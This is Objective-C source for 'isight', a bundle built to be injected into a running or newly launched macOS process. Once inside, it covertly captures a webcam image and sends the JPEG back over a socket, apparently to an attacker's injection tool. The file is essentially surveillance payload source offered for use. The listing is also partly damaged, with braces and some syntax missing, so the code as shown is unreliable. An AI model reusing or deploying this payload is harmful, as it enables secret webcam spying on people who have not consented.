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* isight -- An injectable bundle to capture an image from the
* attached iSight video camera.
* inject-bundle isight <pid>
* inject-bundle isight <cmd> [ <args> ... ]
* run-bundle isight
* This bundle is meant to be injected into a running or newly
* launched process by inject-bundle. It will capture a single
* image from the iSight video camera and store it as
* /tmp/isight.jpg.
* This bundle uses Tim Omernick's CocoaSequence Grabber from
* MacFUSE procfs.
* Due to inclusion of GPL-licensed code, this bundle is also
* licended under the GNU Public License.
#import "CocoaSequenceGrabber.h"
BOOL shouldKeepRunning = YES;
* This delegate handles the didReceiveFrame callback from CSGCamera,
* which we use to convert the image to a JPEG.
@interface CSGCameraDelegate : CSGCamera
CFMutableDataRef data;
* Assign a CFMutableDataRef to receive JPEG image data
- (void)setDataRef:(CFMutableDataRef)dataRef;
* Convert captured frame into a JPEG datastream, stored in a CFDataRef
- (void)camera:(CSGCamera *)aCamera didReceiveFrame:(CSGImage *)aFrame;
@implementation CSGCameraDelegate
- (void)setDataRef:(CFMutableDataRef)dataRef
data = dataRef;
- (void)camera:(CSGCamera *)aCamera didReceiveFrame:(CSGImage *)aFrame;
// First, we must convert to a TIFF bitmap
NSBitmapImageRep *imageRep =
[NSBitmapImageRep imageRepWithData: [aFrame TIFFRepresentation]];
NSNumber *quality = [NSNumber numberWithFloat: 0.1];
NSDictionary *props =
[NSDictionary dictionaryWithObject:quality
// Now convert TIFF bitmap to JPEG compressed image
NSData *jpeg =
[imageRep representationUsingType: NSJPEGFileType properties:props];
// Store JPEG image in a CFDataRef
CFIndex jpegLen = CFDataGetLength((CFDataRef)jpeg);
CFDataSetLength(data, jpegLen);
CFDataReplaceBytes(data, CFRangeMake((CFIndex)0, jpegLen),
CFDataGetBytePtr((CFDataRef)jpeg), jpegLen);
// Stop the camera and signal that we should exit the run loop
[aCamera stop];
shouldKeepRunning = NO;
void run(int socket)
NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
* Use CocoaSequenceGrabber to capture a single image from the
* iSight camera and store it as a JPEG data stream in picture.
CFMutableDataRef picture = CFDataCreateMutable(NULL, 0);
CSGCameraDelegate *delegate = [[CSGCameraDelegate alloc] init];
[delegate setDataRef:picture];
CSGCamera *camera = [[CSGCamera alloc] init];
[camera setDelegate:delegate];
[camera startWithSize:NSMakeSize(640, 480)];
* Execute RunLoop until global flag is cleared
NSRunLoop *theRL = [NSRunLoop currentRunLoop];
while (shouldKeepRunning && [theRL runMode:NSDefaultRunLoopMode
beforeDate:[NSDate distantFuture]]);
* Write out picture to to socket
if (socket > 0) {
size_t len = CFDataGetLength(picture);
write(socket, &len, sizeof(len));
write(socket, CFDataGetBytePtr(picture), len);
[pool release];